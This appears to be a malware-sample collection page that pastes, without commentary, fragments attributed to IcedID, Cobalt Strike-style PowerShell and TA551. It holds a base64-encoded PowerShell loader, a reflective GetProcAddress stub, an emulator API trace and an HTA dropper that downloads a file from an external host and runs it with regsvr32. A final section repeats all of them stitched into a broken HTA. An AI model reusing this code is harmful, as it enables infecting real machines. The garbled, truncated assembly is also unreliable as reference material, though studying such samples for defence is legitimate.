Aadi Chandra LunaMarginis

## Icedid_PS_ShareFinder
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAO19a3fbRpLod/2KjsRzScYk9LCdh+ZqJ7Qkx5yRJY0ox7tX0fFAQFNEDAIMAErmJP7vW1X9xoOkZHs2Z2+YHItsdFdXd1fXuxtbGf91HmU8Z/07nuVRmrC9jY3/u7XB4DOczmI+5UnhF/ggHbPRxM/4OEpCnrFi4hdsXkRx9C+eU338TIpilu9vb99GxWR+4wXpdHvqF0U05rkAsz3LAUTMg4IVqW4GDxfQwRg7CaP8vbdBj14s2A/Q5fSXncXG1n9sbIznSUC4nPL7/jB5zadptnidhvOYb/xGLSTq+PFG/3V6dj4ajjZ00WHG/QIG6ycsSvpTas78POfTmxi+JCGbCmC6xWBeTNJsn72GQUz4Pfsx8/kNjL7zgzusrm5xEgU8yfk+ezE6Yk/7h7E/z7l+eiHmO2RHfMZhHpMg4vk+O00TU+dshhD9uLaOGd7R8ejwYnh+OTw7Nfi+nfCEhbhGUXLLgnlepFPGk/k078EkZ/OggC840Hky9RP/FjBRkwoPooJFZi0THvA892GKihRnKQ0imD36kZhZEzPmsctJlLMJj2cwOwqkBhXUTbxoKQgpgCc3nM0QbIhdwGyzNiLe7mkobTGCthjBIAz7b6Pk6d7lYsbNKDwzGd754GLw+vjy+IIJIjn1p9bajmY8iMYwt9RZyHNamATqsHGaUeFSKvHYcKyBmQ5gClmSFmyWpXdRyEOa1vsojnFd/Hlc0AyyH98Mj2xcj/9z8Pr85NiUtARIdlBD7axv9UeTQM1wj+Dfq7N5MZsXODGdqwux3WBuvONpVHii5Yt5FMM2vu5eU4tzP/On9K2jEbiiQl7wrHOe5hFtvAO2I1tQjZ/8OAphZU/T4nQex2fZ8XRWLDp2lVGRASlel4dFmB+wqx/nUXi9vw9DxG+drneZihYdsaW6YkSto0UyUEsgZuTs5hfkItbwVAWE3bH6

## Win_API_CS
Loaded 33405 bytes from file file.bin
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

4098a1  VirtualAlloc(base=0 , sz=864d7) = 600000
4092d5  LoadLibraryA(KERNEL32.dll)
4093a1  GetProcAddress(GetThreadContext)
4093a1  GetProcAddress(ReadProcessMemory)
4093a1  GetProcAddress(CreateProcessA)

## Icedid_PS_CS
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

## ASPackUnpacker
//////////////////////////////////////////////////
//  FileName    :  ASPack 2.xx.txt
//  Comment     :  OEP Find For ASPack 2.xx
//  Author      :  _pusher_
//  Date        :  2015-07-08
//////////////////////////////////////////////////

//start
msg "ASPack 2.xx OEP Finder"
msg "make sure you're at the entry point of the program before you continue"

## TA551xml_HTA_downloader
html&gt;&lt;body&gt;&lt;div id='inIn'&gt;

var lineLady = new ActiveXObject("msxml2.xmlhttp");lineLady.open("GET", "http://carwaded[.]com/cbfsd/P9G7gD1E6t9w22zQj/cC9DHcTHUKJV/ugnbvdk0EInGgeCqaLEYILzxL/zes1?ref=wU4bJ1ZLhoMc8BcRMMqy&q=ELOKZymM", false);lineLady.send();if(lineLady.status == 200){try{var redLine = new ActiveXObject("adodb.stream");redLine.open;redLine.type = 1;redLine.write(lineLady.responsebody);redLine.savetofile("c:\\users\\public\\ladyLine.jpg", 2);redLine.close;}catch(e){}};


/div&gt;&lt;div id='ladyCaroline'&gt;&lt;/div&gt;&lt;div id='youInIn'&gt;

var ladyInKing = new ActiveXObject("wscript.shell");var carolineLine = new ActiveXObject("scripting.filesystemobject");ladyInKing.run("regsvr32 c:\\users\\public\\ladyLine.jpg");

/div&gt;&lt;script language='javascript'&gt;function lineMySea(youMySea){return(new ActiveXObject(youMySea));}function inLoveRed(youLoveLady){return(ladyLove.getElementById(youLoveLady).innerHTML);}function myYouRed(lineYouYou){return('cha' + lineYouYou);}function redL

## TA551xml
xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:

## Deobscript
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="CS"
APPLICATIONNAME="Test"
WINDOWSTATE="minimize"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
CAPTION="no"
SHOWINTASKBAR="no">
	Loaded 33405 bytes from file file.bin
	Initialization Complete..
	Max Steps: 2000000
	Using base offset: 0x401000

	4098a1 VirtualAlloc(base=0 , sz=864d7) = 600000
	4092d5 LoadLibraryA(KERNEL32.dll)
	4093a1 GetProcAddress(GetThreadContext)
	4093a1 GetProcAddress(ReadProcessMemory)
	4093a1 GetProcAddress(CreateProcessA)
	Set-StrictMode -Version 2

	$DoIt = @'
	function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
	}
	//////////////////////////////////////////////////
	// FileName : ASPack 2.xx.txt
	// Comment : OEP Find For ASPack 2.xx
	// Author : _pusher_
	// Date : 2015-07-08
	//////////////////////////////////////////////////

	//start
	msg "ASPack 2.xx OEP Finder"
	msg "make sure you're at the entry point of the program before you continue"
	html><body><div id='inIn'>

	var lineLady = new ActiveXObject("msxml2.xmlhttp");lineLady.open("GET", "http://carwaded[.]com/cbfsd/P9G7gD1E6t9w22zQj/cC9DHcTHUKJV/ugnbvdk0EInGgeCqaLEYILzxL/zes1?ref=wU4bJ1ZLhoMc8BcRMMqy&q=ELOKZymM", false);lineLady.send();if(lineLady.status == 200){try{var redLine = new ActiveXObject("adodb.stream");redLine.open;redLine.type = 1;redLine.write(lineLady.responsebody);redLine.savetofile("c:\\users\\public\\ladyLine.jpg", 2);redLine.close;}catch(e){}};


	/div><div id='ladyCaroline'></div><div id='youInIn'>

	var ladyInKing = new ActiveXObject("wscript.shell");var carolineLine = new ActiveXObject("scripting.filesystemobject");ladyInKing.run("regsvr32 c:\\users\\public\\ladyLine.jpg");

	/div><script language='javascript'>function lineMySea(youMySea){return(new ActiveXObject(youMySea));}function inLoveRed(youLoveLady){return(ladyLove.getElementById(youLoveLady).innerHTML);}function myYouRed(lineYouYou){return('cha' + lineYouYou);}function redL
	<!DOCTYPE html>
	<html>
	<head>
	<HTA:APPLICATION ID="CS"
	APPLICATIONNAME="Test"
	WINDOWSTATE="minimize"
	MAXIMIZEBUTTON="no"
	MINIMIZEBUTTON="no"
	CAPTION="no"
	SHOWINTASKBAR="no">